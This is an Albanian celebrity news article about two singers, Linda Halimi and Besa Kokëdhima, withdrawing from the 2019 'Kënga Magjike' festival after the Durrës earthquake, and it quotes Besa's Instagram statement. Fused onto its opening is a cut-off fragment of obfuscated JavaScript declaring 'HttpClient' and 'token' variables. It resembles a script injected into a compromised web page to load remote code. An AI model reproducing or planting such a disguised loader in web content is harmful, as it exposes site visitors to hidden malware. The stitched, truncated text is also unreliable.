;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sonte nata e parë e ‘Kënga Magjike’: Cilët artistë braktisën në mes këtë edicion?

By

Sonte në mbrëmje nisë nata e parë LIVE e këtij edicioni të festivalit ‘Kënga Magjike’, si zakonisht nga Pallati i Kongreseve.

Këtë vit, festivali ka një peshë tjetër sepse në fund i është bashkëngjitur kauza ‘këndo për të ndërtuar’ me fonde të dedikuara për të prekurit nga tërmeti i tmerrshëm i Durrësit.

Por, janë dy këngëtare që kjo natë nuk do i sjellë në skenë përkundër faktit se konkuruan me projekt muzikor në këtë edicion të ‘Kënga Magjike’.

Fjala është për Linda Halimin dhe Besa Kokëdhimën që për arsye të ndryshme braktisën pjesëmarrjen në festival.

View this post on Instagram

Te dashur miq, me keqardhje ju njoftoj se ne kete kohe tragjedie, pikellimi dhe paniku, e kam te pamundur te performoj “Histori” me dt 5 – 7 Dhjetor ne Kenga Magjike 2019. Zemra ime eshte e ngarkuar me deshperim dhe vuajtje per ata qe nuk jane me, dhe nuk jam ne gjendje te gezoj kur me bashkekombesit e mi ka ndodhur kaq shume; ndaj me duhet te terhiqem zyrtarisht nga Kenga Magjike 2019! Jam e bindur qe Kenga Magjike do beje nje pune te lavderueshme per te kontribuar ne menyren e saj per te ndihmuar te prekurit, une do jap ne heshtje ndihmen dhe kontributin tim per te lehtesuar sado pak dhimbjen e tyre, dhe respektuar humbjet e pashlyeshme te tyre. Kerkoj ndjese fansave te mi te cilet prisnin performimin tim dhe falenderoj organizatoret dhe @arditgjebrea per githcka kane bere per mua dhe koleget e mi! Dear friends, I regret to inform you that at this time of tragedy, sorrow and panic, I am unable to perform December 5 – 7 at The Magic Song 2019. My heart is filled with despair and suffering for those who are no more, and I am unable to sing when so much has happened to my countrymen; therefore I have to officially withdraw my entry “History” from Magic Song 2019 competition! I am convinced that the Magic Song will do a notable job to contribute towards helping those affected, and I will quietly give my help and contribution to try easen their pain, and respect their irreparable losses. I apologize to my fans who were waiting for my performance and thank the organizers and @arditgjebrea for everything they have done for me and my colleagues!

A post shared by Besa (@besaofficial) on

Teksa Linda u detyrua të tërhiqej shkaku i vajzës së vogël dhe jetesës në SHBA, Besa vendimin e mori duke e parë të pamundur performancën pas tragjedisë natyrore që përfshiu Shqipërinë.

Për këtë të fundit, pati një thirrje nga producenti Gjebrea që ta rishqyrtojë vendimin mirëpo nuk pati përgjigje. /Prive.al

Artikuj të ngjashëm